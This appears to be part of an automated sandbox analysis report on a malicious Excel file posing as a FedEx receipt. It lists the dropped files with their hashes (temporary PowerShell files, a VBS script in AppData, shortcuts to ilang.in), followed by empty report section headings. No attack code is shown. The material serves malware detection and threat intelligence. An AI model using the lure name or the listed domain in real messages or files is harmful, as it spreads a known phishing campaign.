C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49B2AD28.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	9ABE7EB352E0DB96B52C99AC2FDEA85F	8DC45D02308275BA32B7FFB320A3042256D40C8B	EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A060125D.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	8353C019D97558D11AE2191FB65D8596	C7A92B5986413D4586EAEF966584EC753DF2EF9A	8BFBF9E129AACF4868CC5290A1E66A18C4B8A71018AADDA05902F26C70424C87
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC19605E.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	2799EF71A3A070C8F75094A70E785CB3	74B47B2D359AA51F97491C079E95664E295371C7	AF2429FEC6E5CE4F86804F436E61AC49402A6019DF99501C11C374DC7825D504
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B654C9D0.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	992A1E6D24A12107F69F58030011DEC7	7CF75A29F778D9A96C43171B0F66996AEDA01E56	C22DF47ABDACD467445FDD180E346B055D45808E18959C0326E1921456A09E81
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0071F91.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	8353C019D97558D11AE2191FB65D8596	C7A92B5986413D4586EAEF966584EC753DF2EF9A	8BFBF9E129AACF4868CC5290A1E66A18C4B8A71018AADDA05902F26C70424C87
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C576F173.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	ED71466E3B22D54C501EA175EEEFA127	2AC9D83749B53E522F0CDA5682975BE3AEE94F35	3E1C8BEFB1852CDE90EF5E576E57E703EC814E15DFE94BB16118ED68B0389236
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C8BDC0CC.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	992A1E6D24A12107F69F58030011DEC7	7CF75A29F778D9A96C43171B0F66996AEDA01E56	C22DF47ABDACD467445FDD180E346B055D45808E18959C0326E1921456A09E81
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7F8BB09.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	65103012FD0D90B64E04605779EBA439	E28FEF0979669A7CA78C0B17E21B551E361EF85E	40DE1766B2589303FF3F0C27D6CA82A28EE5A6576B7F38BEEBA017E777881CCF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc	Rich Text Format data, version 1	FC6D03389137A4F7B1C724EC632A3E13	4BAAEB9B744174CDA60DD44D32C8B93088B34DA6	DFC80706C16EF11550F70829E4EDD5722FDA298BC55FCDFF152F1A5E85FDDB28
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FCA8856D.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	A4D3F37D25C314D8BD34E11152527E97	6DF7C881FE8102F196CAE0D5AF9C00CC26583B02	E0B38B2C8079038B0C98440A0A5945CBB86A41B72154D83EE25F8D362020F9BF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF7914D8.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	3267FCC2FD77EAF59559D8542A124EE0	48B7A23737C4F30FA960949D7399252F36C8939E	7796BEEB72479F928650DF2C6EF5B8024C2626A3F305EC8A8A567EB4160EBD4D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp	Composite Document File V2 Document, Cannot read section info	B723410876C86FA42485AF34FEFCD907	1EE6B005D223F5A4FC52FA21DA820F4A0212813D	B8F787095420D7A0B273CB3281F8B4EBE4096575578AD252FDF34D229097CB2B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{29D23305-219A-4D80-8861-915ABBF4B4F9}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{675C373F-A0A5-4174-81EF-9B7963756970}.tmp	data	4662D08709C089DA83DA8007A7DD6238	7586A47D8E880D4363DFF1BCF57DEF2CE33DCDE1	95F1BC3CDD4903BB106EB40FABB9D70A98E8FB29810DC355A2C957F8E909D273
C:\Users\user\AppData\Local\Temp\g1pg51ke.vno.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\lkqbri10.psi.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\{B9979E9A-C2C8-49EF-84D2-659EC2DBC1C1}	data	35BB914CB7529D6830DB226D0280E524	830423AEE093374D6A56EB417498CD305F0BD4EF	DD457238A949FF6BDC6088813BEA6E3EC1A4A3A8C8E53ECC334696929B3ECDEE
C:\Users\user\AppData\Local\Temp\{E8C51DF7-A67F-426F-9237-3A1AD0DC76AA}	data	275467E6780C37AE8123C88438C512BF	9FAB04FCAB90E13397F240E273CC0A526336F3AD	7BB1686E2E1985ACCA5AC310DB73689ADF04371BDD185E2404433D3331759CFA
C:\Users\user\AppData\Local\Temp\~DF189859C23F2234A3.TMP	data	00FFE30AA992F880D9B5F46DC360D399	374E31C49486B70C278E5CCCD2647D98DF4DD792	1991BA813EC63531BA678F28BFA7B4D5F963628F329EDFFCF38A15C685CB2F83
C:\Users\user\AppData\Local\Temp\~DF5C7C8EE0310B7690.TMP	Composite Document File V2 Document, Cannot read section info	BA62DEC6A4CFC33F17646EEE97C6117B	5F16A123FD2AC2658FE1D601CA724C5F6BD29FCA	DB86F917382D8A20D223A9F79B165927E0A2B3DB13EC3AACAD6E2A7C63E01C76
C:\Users\user\AppData\Local\Temp\~DF77812CD9DDE0C54D.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFC8B72E5CB50845D1.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFE1D622D06AD63FEF.TMP	Composite Document File V2 Document, Cannot read section info	CA165C954DD793BD304514A159F64205	2DE39F0A75C9859A02596CD1ECCADDE9FA9D1001	6037FE889FC9D9C921A5DB6C487812226F190176A7EC6DC7C81EB15E3EBAF9A1
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store	data	C61F99FE7BEE945FC31B62121BE075CD	083BBD0568633FECB8984002EB4FE8FA08E17DD9	1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei	data	8A8D71BED4B5760F2F82C680C2C8CACC	FA589EA7BA858C514079289BCEA3625432110427	78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BrlcB.url	MS Windows 95 Internet shortcut text (URL=<http://ilang.in/BrlcB>), ASCII text, with CRLF line terminators	74B7B20DE6855D1255C4ECEED967D972	197F8414D6C89F6922AE73B4F67740AC12F4807F	DDACDD06C181CC5275A09ACEE6D80632270519A5FBF4F7436973532E8C71161B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ilang.in.url	MS Windows 95 Internet shortcut text (URL=<http://ilang.in/>), ASCII text, with CRLF line terminators	C959E84761331F00A1648380AEA62A45	6D72668142BB5AC5EF9A59EB597A14D3A28681EC	ECD3EFC6B16BD69D16B608E30403E3872B6C7E47CB0B5A393128575B82FDD194
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Generic INItialization configuration [xls]	DB13A18C74332630B00B4EF58F9CEABF	8C1CD1737FBE78EDE01902C6BA30DAB010FCE412	50075212B63FB9DB064615B123D6E6E1B029C5C687842D6D5299F0BEC9D20023
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	CA9570952A5F48F847628233AB5AB2D4	109750BB54BEFE801619BFE33AFE1BA2DCC152AB	35BC7B00A750EC0D7066E16C7A8021E46EB3E4937D83FC67F47AF3AEC99135EC
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\I0GD6N06.txt	ASCII text	AB224770FE62AE2B0D959987EEB70724	F91193F76AACBDA1840FEC1519972A60FCFDACA4	CA763477B398BB5E9650AE8A35022513B893A150B0507E8FAB5EEC8CF3B6B710
C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS	Unicode text, UTF-16, little-endian text, with CRLF line terminators	EA1D347A4039B2E1E28ABC47632FEC36	665B0B2848158A97B869BC857B960E5B368C8FC3	6EE8EEFF1A72D43329384218C45CBAF41DF6B7F3AFC7B95138B24087B796B07F
C:\Users\user\Desktop\B9930000	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 06:53:18 2024, Security: 1	7ED70967865A87C0B064B15564B4C573	C4AA8944D3261BB2E79EF0C309B2D5484F3C768C	D61A8EEC64A824CAA9C5165A018EA14C7268D011C64D658C2044050B79A100C7
C:\Users\user\Desktop\B9930000:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Desktop\FedEx Receipt_53065724643.xls (copy)	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 06:53:18 2024, Security: 1	7ED70967865A87C0B064B15564B4C573	C4AA8944D3261BB2E79EF0C309B2D5484F3C768C	D61A8EEC64A824CAA9C5165A018EA14C7268D011C64D658C2044050B79A100C7

Windows Analysis Report FedEx Receipt_53065724643.xls

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
FedEx Receipt_53065724643.xls

Malware Threat Intel
Provided by